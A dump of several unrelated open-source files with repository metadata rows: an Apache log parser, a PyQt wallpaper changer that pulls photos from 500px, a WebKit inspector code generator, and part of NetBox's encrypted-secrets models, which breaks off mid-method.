fig.savefig('ie224-actuator-to-reference_bottom.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[6,:])
plt.title('ie224-actuator-to-reference_top')
fig.savefig('ie224-actuator-to-reference_top.png')
| gpl-3.0 | -1,775,381,104,183,834,000 | 28.44 | 75 | 0.646545 | false |
minersoft/httpd_logs | apache_log.py | 1 | 13255 |
#
# Copyright Michael Groys, 2014
#
from ncsa_log import NCSALogFormat, NCSALogRecord, FieldNotDefinedException
from m.utilities import mergeDictionaries
import re
class ApacheLogFormat(NCSALogFormat):
idpattern = r"\>?[a-zA-Z]|\{[-\w]+\}[ieoC]"
# continue field numbering after NCSA basic fields
START_FIELD = NCSALogFormat.NUM_FIELDS
FLD_REMOTE_IP = START_FIELD
FLD_LOCAL_IP = START_FIELD+1
FLD_DURATION_USEC = START_FIELD+2
FLD_FILENAME = START_FIELD+3
FLD_KEEPALIVE_NUM = START_FIELD+4
FLD_PORT = START_FIELD+5
FLD_WORKER_PID = START_FIELD+6
FLD_QUERY_STRING = START_FIELD+7
FLD_HANDLER = START_FIELD+8
FLD_DURATION_SEC = START_FIELD+9
FLD_DEFINED_SERVER_NAME = START_FIELD+10
FLD_SERVER_NAME = START_FIELD+11
FLD_CONNECTION_STATUS = START_FIELD+12
FLD_RECEIVED_BYTES = START_FIELD+13
FLD_SENT_BYTES = START_FIELD+14
FLD_USER_AGENT = START_FIELD+15
FLD_REFERER = START_FIELD+16
FLD_CONTENT_TYPE = START_FIELD+17
FLD_CONTENT_LENGTH = START_FIELD+18
NUM_FIELDS = START_FIELD+19
ourFieldReferences = {
"a": [("remoteIp", FLD_REMOTE_IP)],
"A": [("localIp", FLD_LOCAL_IP)],
"B": [("bytesZero", NCSALogFormat.FLD_NUMBYTES)],
"D": [("durationUsec", FLD_DURATION_USEC)],
"f": [("filename", FLD_FILENAME)],
"H": [("protocol", NCSALogFormat.FLD_PROTOCOL)],
"k": [("keepaliveNum", FLD_KEEPALIVE_NUM)],
"m": [("method", NCSALogFormat.FLD_METHOD)],
"p": [("port", FLD_PORT)],
"P": [("workerPid", FLD_WORKER_PID)],
"q": [("queryString", NCSALogFormat.FLD_QUERY_STRING)],
"R": [("handler", FLD_HANDLER)],
"T": [("durationSec", FLD_DURATION_SEC)],
"U": [("urlPath", NCSALogFormat.FLD_URL_PATH)],
"v": [("definedServerName", FLD_DEFINED_SERVER_NAME)],
"V": [("serverName", FLD_SERVER_NAME)],
"X": [("connectionStatus", FLD_CONNECTION_STATUS)],
"I": [("receivedBytes", FLD_RECEIVED_BYTES)],
"O": [("sentBytes", FLD_SENT_BYTES)],
"{User-agent}i":[("_User_agent_i", FLD_USER_AGENT)],
"{Referer}i": [("_Referer_i", FLD_REFERER)],
"{Content-type}o": [("_Content_type_o", FLD_CONTENT_TYPE)],
"{Content-length}o": [("_Content_length_o", FLD_CONTENT_LENGTH)],
}
fieldReferences = mergeDictionaries(NCSALogFormat.fieldReferences, ourFieldReferences)
ourFieldPatterns = {
"a": r"(?P<remoteIp>\d+\.\d+\.\d+\.d+|[0-9a-fA-F:]+)",
"A": r"(?P<localIp>\d+\.\d+\.\d+\.d+|[0-9a-fA-F:]+)",
"B": r"(?P<bytesZero>\d+)",
"D": r"(?P<durationUsec>\d+)",
"f": r"(?P<filename>[^\s]+)",
"H": r"(?P<protocol>[\w/.]+)",
"k": r"(?P<keepaliveNum>\d+)",
"m": r"(?P<method>[A-Z]+)",
"p": r"(?P<port>\d+)",
"P": r"(?P<workerPid>\d+)",
"q": r"(?P<queryString>\?[^\s]+|)",
"R": r"(?P<handler>[^\s]+)",
"T": r"(?P<durationSec>\d+)",
"U": r"(?P<urlPath>[^\s?]+)",
"v": r"(?P<definedServerName>[^\s]+)",
"V": r"(?P<serverName>[^\s]+)",
"X": r"(?P<connectionStatus>[-X+])",
"I": r"(?P<receivedBytes>\d+)",
"O": r"(?P<sentBytes>\d+)",
"{User-agent}i": r"(?P<_User_agent_i>[^\"]*)",
"{Referer}i": r"(?P<_Referer_i>[^\s]+|-)",
"{Content-type}o": r"(?P<_Content_type_o>[^\"]+|-)",
"{Content-length}o": r"(?P<_Content_length_o>\d+|-)",
}
fieldPatterns = mergeDictionaries(NCSALogFormat.fieldPatterns, ourFieldPatterns)
# exceptional fields have both direct access and access via corresponding container
exceptionalFields = set(["{User-agent}i", "{Referer}i", "{Content-type}o", "{Content-length}o"])
predefinedFormats = {
"common": "%h %l %u %t \"%r\" %>s %b",
"vcommon": "%v %h %l %u %t \"%r\" %>s %b",
"extended": "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"",
"combined": "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"",
}
def __init__(self, formatStr):
self.inputHdrFields = {}
self.outputHdrFields = {}
        self.envHdrFields = {}
        self.cookieHdrFields = {}
resolved = ApacheLogFormat.predefinedFormats.get(formatStr)
if resolved:
formatStr = resolved
NCSALogFormat.__init__(self, formatStr)
fieldSubRE = re.compile("[-{}]")
def getCollectionFieldGroupName(self, field):
return ApacheLogFormat.fieldSubRE.sub("_", field)
def getPattern(self, field, default):
if field.startswith("{"):
if field in self.__class__.exceptionalFields:
pattern = NCSALogFormat.getPattern(self, field, default)
elif len(field)>3 and (field[-2:] in ["}i", "}o", "}e", "}c"]):
groupName =self.getCollectionFieldGroupName(field)
pattern = r"(?P<%s>.*)" % groupName
else:
pattern = default
else:
pattern = NCSALogFormat.getPattern(self, field, default)
return pattern
def registerFieldReferences(self, field):
NCSALogFormat.registerFieldReferences(self, field)
if len(field)>3:
if field[-2:] == "}i":
self.addReference(self.getCollectionFieldGroupName(field), self.inputHdrFields, field[1:-2])
elif field[-2:] == "}o":
self.addReference(self.getCollectionFieldGroupName(field), self.outputHdrFields, field[1:-2])
elif field[-2:] == "}e":
self.addReference(self.getCollectionFieldGroupName(field), self.envHdrFields, field[1:-2])
elif field[-2:] == "}C":
self.addReference(self.getCollectionFieldGroupName(field), self.cookieHdrFields, field[1:-2])
def getInputHdrField(self, fieldName, matchObj):
groupId = self.inputHdrFields.get(fieldName)
        if groupId is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasInputHdrField(self,fieldName):
return fieldName in self.inputHdrFields
def getOutputHdrField(self, fieldName, matchObj):
groupId = self.outputHdrFields.get(fieldName)
        if groupId is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasOutputHdrField(self,fieldName):
return fieldName in self.outputHdrFields
def getEnvHdrField(self, fieldName, matchObj):
groupId = self.envHdrFields.get(fieldName)
        if groupId is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasEnvHdrField(self,fieldName):
return fieldName in self.envHdrFields
def getCookieHdrField(self, fieldName, matchObj):
groupId = self.cookieHdrFields.get(fieldName)
        if groupId is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasCookieHdrField(self,fieldName):
return fieldName in self.cookieHdrFields
class ApacheLogRecord(NCSALogRecord):
def __init__(self, format, line, match=None):
NCSALogRecord.__init__(self, format, line, match)
def inputHdrField(self, fieldName):
return self._format.getInputHdrField(fieldName, self._match)
def outputHdrField(self, fieldName):
return self._format.getOutputHdrField(fieldName, self._match)
def envHdrField(self, fieldName):
return self._format.getEnvHdrField(fieldName, self._match)
def cookieHdrField(self, fieldName):
return self._format.getCookieHdrField(fieldName, self._match)
@property
def remoteIp(self):
return self._format.getField(ApacheLogFormat.FLD_REMOTE_IP, self._match)
@property
def localIp(self):
return self._format.getField(ApacheLogFormat.FLD_LOCAL_IP, self._match)
@property
def durationUsecAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_DURATION_USEC, self._match)
@property
def durationUsec(self):
val = self.durationUsecAsStr
return 0 if val=="-" else int(val)
@property
def durationSecAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_DURATION_SEC, self._match)
@property
def durationSec(self):
val = self.durationSecAsStr
return 0 if val=="-" else int(val)
@property
def duration(self):
if self._format.hasField(ApacheLogFormat.FLD_DURATION_USEC):
return self.durationUsec/1000000.
return float(self.durationSec)
@property
def filename(self):
return self._format.getField(ApacheLogFormat.FLD_FILENAME, self._match)
@property
def keepaliveNumAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_KEEPALIVE_NUM, self._match)
@property
def keepaliveNum(self):
val = self.keepaliveNumAsStr
return 0 if val=="-" else int(val)
@property
def portAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_PORT, self._match)
@property
def port(self):
val = self.portAsStr
return 0 if val=="-" else int(val)
@property
def workerPidAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_WORKER_PID, self._match)
@property
def workerPid(self):
val = self.workerPidAsStr
return 0 if val=="-" else int(val)
@property
def handler(self):
return self._format.getField(ApacheLogFormat.FLD_HANDLER, self._match)
@property
def definedServerName(self):
return self._format.getField(ApacheLogFormat.FLD_DEFINED_SERVER_NAME, self._match)
@property
def serverName(self):
return self._format.getField(ApacheLogFormat.FLD_SERVER_NAME, self._match)
@property
def connectionStatus(self):
return self._format.getField(ApacheLogFormat.FLD_CONNECTION_STATUS, self._match)
@property
def receivedBytesAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_RECEIVED_BYTES, self._match)
@property
def receivedBytes(self):
val = self.receivedBytesAsStr
return 0 if val=="-" else int(val)
@property
def sentBytesAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_SENT_BYTES, self._match)
@property
def sentBytes(self):
val = self.sentBytesAsStr
return 0 if val=="-" else int(val)
@property
def userAgent(self):
return self._format.getField(ApacheLogFormat.FLD_USER_AGENT, self._match)
@property
def referer(self):
return self._format.getField(ApacheLogFormat.FLD_REFERER, self._match)
@property
def contentType(self):
return self._format.getField(ApacheLogFormat.FLD_CONTENT_TYPE, self._match)
@property
def contentLengthAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_CONTENT_LENGTH, self._match)
@property
def contentLength(self):
val = self.contentLengthAsStr
return -1 if val=="-" else int(val)
def getTestApacheRecord():
alf = ApacheLogFormat(formatStr = "extended")
line = '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 "http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"'
return ApacheLogRecord(alf, line)
def getTestCustomApacheRecord():
alf = ApacheLogFormat(formatStr = "%t %Dusec %h \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\" \"%{Content-type}o\" %{Content-length}o")
line = '[30/Oct/2014:23:28:19 +0200] 134usec 127.0.0.1 "GET http://www.host.com/path?query HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0" "text/html; charset=ISO-8859-4" 1000'
return ApacheLogRecord(alf, line)
def test():
import m.ut_utils as ut
ut.START_TEST("apache_log_basic")
record = getTestApacheRecord()
ut.EXPECT_EQ("", "record.queryString")
ut.EXPECT_EQ("http://www.example.com/start.html", "record.referer")
ut.EXPECT_EQ("Mozilla/4.08 [en] (Win98; I ;Nav)", "record.userAgent")
ut.EXPECT_EQ("http://www.example.com/start.html", "record.inputHdrField('Referer')")
ut.EXPECT_EQ("Mozilla/4.08 [en] (Win98; I ;Nav)", "record.inputHdrField('User-agent')")
ut.EXPECT_EQ("127.0.0.1", "record.remoteHost")
ut.END_TEST()
ut.START_TEST("apache_log_custom")
record = getTestCustomApacheRecord()
ut.EXPECT_EQ("?query", "record.queryString")
ut.EXPECT_EQ("/path", "record.urlPath")
ut.EXPECT_EQ("http://www.host.com", "record.urlRoot")
ut.EXPECT_EQ("-", "record.referer")
ut.EXPECT_EQ(134e-6, "record.duration")
ut.EXPECT_EQ("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0", "record.userAgent")
ut.EXPECT_EQ("text/html; charset=ISO-8859-4", "record.contentType")
ut.EXPECT_EQ(1000, "record.contentLength")
    ut.END_TEST()
| bsd-3-clause | -8,697,373,372,509,737,000 | 38.335312 | 229 | 0.608751 | false |
globalpolicy/pyWall | main.py | 1 | 6745 |
# Author : globalpolicy
# Date : March 2-4, 2017
# Script : pyWall
# Description : Change windows wallpaper
# Python : 3.5
# Blog : c0dew0rth.blogspot.com
import requests
from bs4 import BeautifulSoup
import random
import shutil # for copying raw image data(a file-like object) to an actual image file
import ctypes # for calling Win32 API, specifically, SystemParametersInfo, to set wallpaper
import base64 # for turning original imagename into filesystem safe name
import tempfile # for obtaining temp directory
import os # for deleting file
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel, QTextEdit, QCheckBox, \
QSystemTrayIcon # for GUI
from PyQt5.QtGui import QFont, QIcon
import sys # for sys.exit(app.exec_())
import threading # for multithreading obviously
import time # for timing utilities
class QTGui(QWidget):
def __init__(self):
super().__init__()
self.showWindow()
def changeEvent(self, QEvent):
if QEvent.type() == QEvent.WindowStateChange:
if self.isMinimized():
print("minimized")
self.minimizetotray()
super().changeEvent(QEvent)
def showWindow(self):
self.setGeometry(300, 300, 300, 63)
self.setFixedSize(self.size())
self.setWindowIcon(QIcon("icon.png"))
self.setWindowTitle("pyWall UI")
global btn
btn = QPushButton("Change", self)
btn.resize(75, 23)
btn.move(0, self.height() - btn.height())
btn.setToolTip("Change the wallpaper right now.")
btn.clicked.connect(newWallpaperInNewThread)
global txtinterval
txtinterval = QTextEdit("100", self)
txtinterval.setToolTip("Time interval in seconds between wallpaper changes.")
txtinterval.resize(70, 23)
txtinterval.move(0, btn.y() - txtinterval.height())
global chkbox
chkbox = QCheckBox("Timer", self)
chkbox.setToolTip("Use timer for auto wallpaper change.")
chkbox.resize(49, 17)
chkbox.move(0, txtinterval.y() - chkbox.height())
chkbox.stateChanged.connect(checkBoxStateChanged)
global label
label = QLabel("", self)
label.setFont(QFont("Times", 8, QFont.Bold))
label.move(btn.width() + 5, 0)
label.resize(self.width()-btn.width(),self.height())
label.setWordWrap(True)
self.show()
def minimizetotray(self):
self.hide()
self.tray = QSystemTrayIcon()
self.tray.setIcon(QIcon("icon.png"))
self.tray.setToolTip("pyWall Tray")
self.tray.show()
self.tray.showMessage("pyWall", "pyWall will run in background.", msecs=500)
self.tray.activated.connect(self.trayiconactivated)
def trayiconactivated(self, reason):
if reason == QSystemTrayIcon.Trigger:
self.tray.hide()
self.show()
def checkBoxStateChanged(self):
timerStatus = chkbox.checkState() # chkbox.checkState() returns the "after-changed" status
try:
timerInterval = float(txtinterval.toPlainText())
except ValueError:
timerInterval = 300 # fail-safe value
if timerStatus: # True if checked
global killThreadEvent
killThreadEvent = threading.Event()
threading.Thread(target=newWallpaperLoop, args=(timerInterval, killThreadEvent), daemon=True).start()
else:
killThreadEvent.set() # setting this event will request the thread to stop
def main():
app = QApplication(sys.argv)
ui = QTGui() # instantiate our GUI class wherein the form actually displays
sys.exit(app.exec_()) # wait while GUI not closed
def newWallpaperInNewThread():
threading.Thread(target=newWallpaper, daemon=True).start()
def newWallpaper():
    global savepath  # keep the path across calls so the previously downloaded image can be deleted next run
try:
os.remove(savepath) # delete the last downloaded image, the wallpaper will not be affected
print("Deleted ",savepath)
except Exception as ex:
print("Exception occurred while doing os.remove()\nException : ", ex)
try:
firstURL = "https://500px.com/popular"
firstResponse = requests.get(firstURL)
cookie = firstResponse.cookies["_hpx1"]
content = firstResponse.content
soup = BeautifulSoup(content, "lxml")
found = soup.find("meta", attrs={"name": "csrf-token"})
csrfToken = found["content"]
randomPage = random.randint(1, 1000)
apiURL = "https://api.500px.com/v1/photos"
secondResponse = requests.get(apiURL, params={"rpp": 50, "feature": "popular", "image_size": 1080, "sort": "rating",
"exclude": "Nude", "formats": "jpeg", "page": randomPage},
headers={"Cookie": "_hpx1=" + cookie, "X-CSRF-Token": csrfToken})
# 500px API Reference:
# https://github.com/500px/api-documentation/blob/master/endpoints/photo/GET_photos.md
jsonResponse = secondResponse.json()
randomIndex = random.randint(0, 49)
randomImageLink = jsonResponse["photos"][randomIndex]["images"][0]["url"]
randomImageName = jsonResponse["photos"][randomIndex]["name"]
print(randomImageLink)
print(randomImageName)
label.setText(randomImageName)
randomImageName = base64.urlsafe_b64encode(randomImageName.encode("UTF-8")).decode(
"UTF-8") # base64 encoding turns any imagename into a filesystem friendly name
download = requests.get(randomImageLink, stream=True) # stream=True is required to access download.raw data
except Exception as ex:
print("Something went wrong while downloading, no internet?\nException : ",ex)
return
try:
savepath = tempfile.gettempdir() + "\\" + randomImageName + ".jpg"
with open(savepath, "wb") as file:
shutil.copyfileobj(download.raw, file)
SPI_SETDESKWALLPAPER = 20
ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, savepath,
0) # ANSI version of the API doesn't seem to work here, thus the W
except Exception as ex:
print("Something went wrong while saving image.\nException : ", ex)
return
def newWallpaperLoop(timerinterval, stop_event):
while not stop_event.is_set():
newWallpaperInNewThread()
print("Spawning now!")
time.sleep(timerinterval)
print("stopped")
main()
| mit | -8,944,200,180,740,626,000 | 37.215116 | 124 | 0.630689 | false |
teamfx/openjfx-8u-dev-rt | modules/web/src/main/native/Source/JavaScriptCore/inspector/scripts/codegen/generate_cpp_alternate_backend_dispatcher_header.py | 1 | 4331 | #!/usr/bin/env python
#
# Copyright (c) 2014, 2016 Apple Inc. All rights reserved.
# Copyright (c) 2014 University of Washington. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
import logging
import string
import re
from string import Template
from cpp_generator import CppGenerator
from cpp_generator_templates import CppGeneratorTemplates as CppTemplates
log = logging.getLogger('global')
class CppAlternateBackendDispatcherHeaderGenerator(CppGenerator):
def __init__(self, *args, **kwargs):
CppGenerator.__init__(self, *args, **kwargs)
def output_filename(self):
return '%sAlternateBackendDispatchers.h' % self.protocol_name()
def generate_output(self):
template_args = {
'includes': self._generate_secondary_header_includes()
}
domains = self.domains_to_generate()
sections = []
sections.append(self.generate_license())
sections.append(Template(CppTemplates.AlternateDispatchersHeaderPrelude).substitute(None, **template_args))
sections.append('\n'.join(filter(None, map(self._generate_handler_declarations_for_domain, domains))))
sections.append(Template(CppTemplates.AlternateDispatchersHeaderPostlude).substitute(None, **template_args))
return '\n\n'.join(sections)
# Private methods.
def _generate_secondary_header_includes(self):
target_framework_name = self.model().framework.name
header_includes = [
([target_framework_name], (target_framework_name, "%sProtocolTypes.h" % self.protocol_name())),
(["JavaScriptCore"], ("JavaScriptCore", "inspector/InspectorFrontendRouter.h")),
(["JavaScriptCore"], ("JavaScriptCore", "inspector/InspectorBackendDispatcher.h")),
]
return '\n'.join(self.generate_includes_from_entries(header_includes))
def _generate_handler_declarations_for_domain(self, domain):
commands = self.commands_for_domain(domain)
if not len(commands):
return ''
command_declarations = []
for command in commands:
command_declarations.append(self._generate_handler_declaration_for_command(command))
handler_args = {
'domainName': domain.domain_name,
'commandDeclarations': '\n'.join(command_declarations),
}
return self.wrap_with_guard_for_domain(domain, Template(CppTemplates.AlternateBackendDispatcherHeaderDomainHandlerInterfaceDeclaration).substitute(None, **handler_args))
def _generate_handler_declaration_for_command(self, command):
lines = []
parameters = ['long callId']
for _parameter in command.call_parameters:
parameters.append('%s in_%s' % (CppGenerator.cpp_type_for_unchecked_formal_in_parameter(_parameter), _parameter.parameter_name))
command_args = {
'commandName': command.command_name,
'parameters': ', '.join(parameters),
}
lines.append(' virtual void %(commandName)s(%(parameters)s) = 0;' % command_args)
return '\n'.join(lines)
| gpl-2.0 | -8,505,268,923,321,353,000 | 42.747475 | 177 | 0.704918 | false |
digitalocean/netbox | netbox/secrets/models.py | 1 | 14739 | import os
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Util import strxor
from django.conf import settings
from django.contrib.auth.hashers import make_password, check_password
from django.contrib.auth.models import Group, User
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_bytes
from taggit.managers import TaggableManager
from extras.models import ChangeLoggedModel, CustomFieldModel, TaggedItem
from extras.utils import extras_features
from utilities.querysets import RestrictedQuerySet
from .exceptions import InvalidKey
from .hashers import SecretValidationHasher
from .querysets import UserKeyQuerySet
from .utils import encrypt_master_key, decrypt_master_key, generate_random_key
__all__ = (
'Secret',
'SecretRole',
'SessionKey',
'UserKey',
)
class UserKey(models.Model):
"""
A UserKey stores a user's personal RSA (public) encryption key, which is used to generate their unique encrypted
copy of the master encryption key. The encrypted instance of the master key can be decrypted only with the user's
matching (private) decryption key.
"""
created = models.DateField(
auto_now_add=True
)
last_updated = models.DateTimeField(
auto_now=True
)
user = models.OneToOneField(
to=User,
on_delete=models.CASCADE,
related_name='user_key',
editable=False
)
public_key = models.TextField(
verbose_name='RSA public key'
)
master_key_cipher = models.BinaryField(
max_length=512,
blank=True,
null=True,
editable=False
)
objects = UserKeyQuerySet.as_manager()
class Meta:
ordering = ['user__username']
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Store the initial public_key and master_key_cipher to check for changes on save().
self.__initial_public_key = self.public_key
self.__initial_master_key_cipher = self.master_key_cipher
def __str__(self):
return self.user.username
def clean(self):
super().clean()
if self.public_key:
# Validate the public key format
try:
pubkey = RSA.import_key(self.public_key)
except ValueError:
raise ValidationError({
'public_key': "Invalid RSA key format."
})
except Exception:
raise ValidationError("Something went wrong while trying to save your key. Please ensure that you're "
"uploading a valid RSA public key in PEM format (no SSH/PGP).")
# Validate the public key length
pubkey_length = pubkey.size_in_bits()
if pubkey_length < settings.SECRETS_MIN_PUBKEY_SIZE:
raise ValidationError({
'public_key': "Insufficient key length. Keys must be at least {} bits long.".format(
settings.SECRETS_MIN_PUBKEY_SIZE
)
})
# We can't use keys bigger than our master_key_cipher field can hold
if pubkey_length > 4096:
raise ValidationError({
'public_key': "Public key size ({}) is too large. Maximum key size is 4096 bits.".format(
pubkey_length
)
})
def save(self, *args, **kwargs):
# Check whether public_key has been modified. If so, nullify the initial master_key_cipher.
if self.__initial_master_key_cipher and self.public_key != self.__initial_public_key:
self.master_key_cipher = None
# If no other active UserKeys exist, generate a new master key and use it to activate this UserKey.
if self.is_filled() and not self.is_active() and not UserKey.objects.active().count():
master_key = generate_random_key()
self.master_key_cipher = encrypt_master_key(master_key, self.public_key)
super().save(*args, **kwargs)
def delete(self, *args, **kwargs):
# If Secrets exist and this is the last active UserKey, prevent its deletion. Deleting the last UserKey will
# result in the master key being destroyed and rendering all Secrets inaccessible.
if Secret.objects.count() and [uk.pk for uk in UserKey.objects.active()] == [self.pk]:
raise Exception("Cannot delete the last active UserKey when Secrets exist! This would render all secrets "
"inaccessible.")
super().delete(*args, **kwargs)
def is_filled(self):
"""
Returns True if the UserKey has been filled with a public RSA key.
"""
return bool(self.public_key)
is_filled.boolean = True
def is_active(self):
"""
Returns True if the UserKey has been populated with an encrypted copy of the master key.
"""
return self.master_key_cipher is not None
is_active.boolean = True
def get_master_key(self, private_key):
"""
        Given the User's private key, return the decrypted master key.
"""
        if not self.is_active():
raise ValueError("Unable to retrieve master key: UserKey is inactive.")
try:
return decrypt_master_key(force_bytes(self.master_key_cipher), private_key)
except ValueError:
return None
def activate(self, master_key):
"""
Activate the UserKey by saving an encrypted copy of the master key to the database.
"""
if not self.public_key:
raise Exception("Cannot activate UserKey: Its public key must be filled first.")
self.master_key_cipher = encrypt_master_key(master_key, self.public_key)
self.save()
class SessionKey(models.Model):
"""
A SessionKey stores a User's temporary key to be used for the encryption and decryption of secrets.
"""
userkey = models.OneToOneField(
to='secrets.UserKey',
on_delete=models.CASCADE,
related_name='session_key',
editable=False
)
cipher = models.BinaryField(
max_length=512,
editable=False
)
hash = models.CharField(
max_length=128,
editable=False
)
created = models.DateTimeField(
auto_now_add=True
)
key = None
class Meta:
ordering = ['userkey__user__username']
def __str__(self):
return self.userkey.user.username
def save(self, master_key=None, *args, **kwargs):
if master_key is None:
raise Exception("The master key must be provided to save a session key.")
# Generate a random 256-bit session key if one is not already defined
if self.key is None:
self.key = generate_random_key()
# Generate SHA256 hash using Django's built-in password hashing mechanism
self.hash = make_password(self.key)
# Encrypt master key using the session key
self.cipher = strxor.strxor(self.key, master_key)
super().save(*args, **kwargs)
def get_master_key(self, session_key):
# Validate the provided session key
if not check_password(session_key, self.hash):
raise InvalidKey("Invalid session key")
# Decrypt master key using provided session key
master_key = strxor.strxor(session_key, bytes(self.cipher))
return master_key
def get_session_key(self, master_key):
# Recover session key using the master key
session_key = strxor.strxor(master_key, bytes(self.cipher))
# Validate the recovered session key
if not check_password(session_key, self.hash):
raise InvalidKey("Invalid master key")
return session_key
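    # Note (added for clarity): the session key wraps the master key with a simple XOR
    # pad, so each key recovers the other: cipher = session_key XOR master_key, hence
    # master_key = session_key XOR cipher and session_key = master_key XOR cipher.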
class SecretRole(ChangeLoggedModel):
"""
A SecretRole represents an arbitrary functional classification of Secrets. For example, a user might define roles
such as "Login Credentials" or "SNMP Communities."
"""
name = models.CharField(
max_length=100,
unique=True
)
slug = models.SlugField(
max_length=100,
unique=True
)
description = models.CharField(
max_length=200,
blank=True,
)
objects = RestrictedQuerySet.as_manager()
csv_headers = ['name', 'slug', 'description']
class Meta:
ordering = ['name']
def __str__(self):
return self.name
def get_absolute_url(self):
return "{}?role={}".format(reverse('secrets:secret_list'), self.slug)
def to_csv(self):
return (
self.name,
self.slug,
self.description,
)
@extras_features('custom_fields', 'custom_links', 'export_templates', 'webhooks')
class Secret(ChangeLoggedModel, CustomFieldModel):
"""
A Secret stores an AES256-encrypted copy of sensitive data, such as passwords or secret keys. An irreversible
SHA-256 hash is stored along with the ciphertext for validation upon decryption. Each Secret is assigned to exactly
one NetBox object, and objects may have multiple Secrets associated with them. A name can optionally be defined
along with the ciphertext; this string is stored as plain text in the database.
A Secret can be up to 65,535 bytes (64KB - 1B) in length. Each secret string will be padded with random data to
a minimum of 64 bytes during encryption in order to protect short strings from ciphertext analysis.
"""
assigned_object_type = models.ForeignKey(
to=ContentType,
on_delete=models.PROTECT
)
assigned_object_id = models.PositiveIntegerField()
assigned_object = GenericForeignKey(
ct_field='assigned_object_type',
fk_field='assigned_object_id'
)
role = models.ForeignKey(
to='secrets.SecretRole',
on_delete=models.PROTECT,
related_name='secrets'
)
name = models.CharField(
max_length=100,
blank=True
)
ciphertext = models.BinaryField(
max_length=65568, # 128-bit IV + 16-bit pad length + 65535B secret + 15B padding
editable=False
)
hash = models.CharField(
max_length=128,
editable=False
)
tags = TaggableManager(through=TaggedItem)
objects = RestrictedQuerySet.as_manager()
plaintext = None
csv_headers = ['assigned_object_type', 'assigned_object_id', 'role', 'name', 'plaintext']
class Meta:
ordering = ('role', 'name', 'pk')
unique_together = ('assigned_object_type', 'assigned_object_id', 'role', 'name')
def __init__(self, *args, **kwargs):
self.plaintext = kwargs.pop('plaintext', None)
super().__init__(*args, **kwargs)
def __str__(self):
return self.name or 'Secret'
def get_absolute_url(self):
return reverse('secrets:secret', args=[self.pk])
def to_csv(self):
return (
f'{self.assigned_object_type.app_label}.{self.assigned_object_type.model}',
self.assigned_object_id,
self.role,
self.name,
self.plaintext or '',
)
def _pad(self, s):
"""
Prepend the length of the plaintext (2B) and pad with garbage to a multiple of 16B (minimum of 64B).
+--+--------+-------------------------------------------+
|LL|MySecret|xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|
+--+--------+-------------------------------------------+
"""
s = s.encode('utf8')
if len(s) > 65535:
raise ValueError("Maximum plaintext size is 65535 bytes.")
# Minimum ciphertext size is 64 bytes to conceal the length of short secrets.
if len(s) <= 62:
pad_length = 62 - len(s)
elif (len(s) + 2) % 16:
pad_length = 16 - ((len(s) + 2) % 16)
else:
pad_length = 0
header = bytes([len(s) >> 8]) + bytes([len(s) % 256])
return header + s + os.urandom(pad_length)
def _unpad(self, s):
"""
Consume the first two bytes of s as a plaintext length indicator and return only that many bytes as the
plaintext.
"""
if isinstance(s[0], str):
plaintext_length = (ord(s[0]) << 8) + ord(s[1])
else:
plaintext_length = (s[0] << 8) + s[1]
return s[2:plaintext_length + 2].decode('utf8')
def encrypt(self, secret_key):
"""
Generate a random initialization vector (IV) for AES. Pad the plaintext to the AES block size (16 bytes) and
encrypt. Prepend the IV for use in decryption. Finally, record the SHA256 hash of the plaintext for validation
upon decryption.
"""
if self.plaintext is None:
